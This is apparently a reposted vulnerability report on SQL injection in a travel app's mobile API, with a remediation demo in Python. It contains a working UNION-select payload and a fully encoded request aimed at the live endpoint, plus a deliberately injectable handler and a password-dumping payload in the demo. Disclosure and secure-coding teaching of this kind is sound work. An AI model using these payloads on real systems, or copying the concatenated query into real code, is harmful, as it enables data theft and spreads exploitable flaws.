SQL Injection Vulnerability and repair of the HTTP API interface behind the mobile phone app

Source: Internet
Author: User

An SQL injection vulnerability exists in the HTTP API interface behind the mobile app.
 
At the same time, this is a serious reminder to all mobile app developers: when building the API interface the app uses to talk to the server, do not assume that encrypted data transmission makes it safe to use request parameters without validating them!
Details: Mafengwo (rendered "beebot" in the source translation) has several mobile apps, one of which is Travel Notes.
 
By decompiling the APK, the HTTP API endpoint the app uses to communicate with the server was found:
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php
 
Although the communication is "encrypted" (each request carries a 32-character hex sign alongside the JSON data), the scheme is easy to replicate. The travels_id parameter goes into the SQL query without any validation, resulting in SQL injection.
Proof of vulnerability:

1. PoC: travels_id is set to the following value (without the quotation marks), as decoded from the request URL below:
"778079 and 1=2 union select 0,char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0,0,0,0,0,0,0,0 --"
The char() call spells the marker string "ababaaabbbaca"; its appearance in the response proves the injected SELECT was executed. URL:
 
http://www.mafengwo.cn/mobile/travelnotes/gettravels.php?r=%7B%22sign%22%3A%22f7c8542ddf4533a09874d4f829123049%22%2C%22data%22%3A%7B%22travels_id%22%3A%22778079+and+1%3D2+union+select+0%2Cchar%2897%2C98%2C97%2C98%2C97%2C97%2C97%2C98%2C98%2C98%2C97%2C99%2C97%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0 --%22%2C%22device_id%22%3A%22a984355c5vt74g%22%7D%7D

Decoded, the r parameter is:
{"sign":"f7c8542ddf4533a09874d4f829123049","data":{"travels_id":"778079 and 1=2 union select 0,char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0,0,0,0,0,0,0,0 --","device_id":"a984355c5vt74g"}}
Return Value:
 
{"data":{"ret":1,"message":{"id":"ababaaabbbaca","content":"0","img_width":320,"img_list":[]}},"sign":"82b60326ab8a7bd4eb43912d371b34d0"}
 
 
2. Evidence that the injection reaches real data: the travelguide_book table has the following columns:
id, p_mddid, mddid, name, p_mdd_name, mdd_name, icon, icon_big, ver, type, expiration, product_id, file, size, password, publish, download, ob, ctime, lasttime
 
 
 
Solution:

Check every API interface for unvalidated parameters and similar defects (the security measures applied on ordinary web pages were not applied at the API layer).

For other suggestions, see "Problem description".

In addition:
(1) Disable the display of server errors.
(2) Please fix this as soon as possible; CSDN's history shows what similar problems can lead to.
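The following is an added example, not code from the report or from the site. It models in Python (the real endpoint is PHP, whose source is not on the page) the two points made above: a client-computed request signature does nothing to stop injection, and the fix belongs on the API layer. The signing scheme (md5 of the JSON data plus a secret embedded in the APK), the database schema and the sample rows are all assumptions constructed for the demo; the marker payload is the one from the PoC, and the second payload is a constructed follow-up that reads a column from the travelguide_book table listed above.

```python
import hashlib
import hmac
import json
import re
import sqlite3

# Hypothetical signing secret shipped inside the APK (an assumption: the real
# app's signing scheme is not described on the page). Because the client must
# compute the sign, anyone who decompiles the app recovers everything needed
# to sign arbitrary parameters.
APP_SECRET = "demo-secret-from-apk"

# The first payload is the marker from the page's PoC (char(...) spells
# "ababaaabbbaca"); the second is a constructed follow-up that pulls a column
# out of travelguide_book, the table the page lists.
MARKER_PAYLOAD = ("778079 and 1=2 union select "
                  "char(97,98,97,98,97,97,97,98,98,98,97,99,97),0,0 --")
DUMP_PAYLOAD = "778079 and 1=2 union select password,name,0 from travelguide_book --"


def sign(data: dict) -> str:
    """Assumed client signature: md5(canonical JSON of data + APP_SECRET)."""
    canonical = json.dumps(data, separators=(",", ":"), sort_keys=True)
    return hashlib.md5((canonical + APP_SECRET).encode()).hexdigest()


def forge_request(travels_id: str) -> str:
    """What an attacker who decompiled the APK sends: any travels_id, validly signed."""
    data = {"travels_id": travels_id, "device_id": "a984355c5vt74g"}
    return json.dumps({"sign": sign(data), "data": data})


def build_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE travels (id INTEGER, content TEXT, img_width INTEGER);
        INSERT INTO travels VALUES (778079, 'A trip to Lijiang', 320);
        CREATE TABLE travelguide_book (id INTEGER, name TEXT, password TEXT);
        INSERT INTO travelguide_book VALUES (1, 'Lijiang guide', 's3cret-download-pw');
    """)
    return db


def _verified_data(r: str):
    """Parse the r parameter and check the sign; returns the data dict or None."""
    req = json.loads(r)
    if not hmac.compare_digest(req.get("sign", ""), sign(req["data"])):
        return None
    return req["data"]


def _render(row) -> dict:
    """Shape the row like the endpoint's JSON response."""
    if row is None:
        return {"ret": 0, "message": "not found"}
    return {"ret": 1, "message": {"id": row[0], "content": row[1],
                                  "img_width": row[2], "img_list": []}}


def handle_vulnerable(db, r: str) -> dict:
    """Models gettravels.php as the page describes it: the sign is checked,
    but travels_id is concatenated straight into the SQL."""
    data = _verified_data(r)
    if data is None:
        return {"ret": 0, "message": "bad sign"}
    sql = "SELECT id, content, img_width FROM travels WHERE id = " + str(data["travels_id"])
    return _render(db.execute(sql).fetchone())


def handle_fixed(db, r: str) -> dict:
    """Same endpoint with the fix the page calls for: validate the parameter
    on the API layer (allow-list a numeric id) and bind it instead of
    concatenating."""
    data = _verified_data(r)
    if data is None:
        return {"ret": 0, "message": "bad sign"}
    travels_id = str(data["travels_id"])
    if not re.fullmatch(r"[0-9]{1,10}", travels_id):
        return {"ret": 0, "message": "invalid travels_id"}
    row = db.execute("SELECT id, content, img_width FROM travels WHERE id = ?",
                     (int(travels_id),)).fetchone()
    return _render(row)


if __name__ == "__main__":
    db = build_db()
    print(handle_vulnerable(db, forge_request(MARKER_PAYLOAD)))  # id == "ababaaabbbaca"
    print(handle_vulnerable(db, forge_request(DUMP_PAYLOAD)))    # leaks the password column
    print(handle_fixed(db, forge_request(MARKER_PAYLOAD)))       # rejected before any SQL runs
    print(handle_fixed(db, forge_request("778079")))             # normal result
```

The signature check passes for every forged request because the attacker holds the same secret the app does; it authenticates the app build, not the intent of the parameters. The hardened handler keeps the signature check but no longer trusts it for input safety: the allow-list rejects anything that is not a plain numeric id, and the bound parameter means even a value that slipped past the check could not alter the query.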
 
Author horseluke
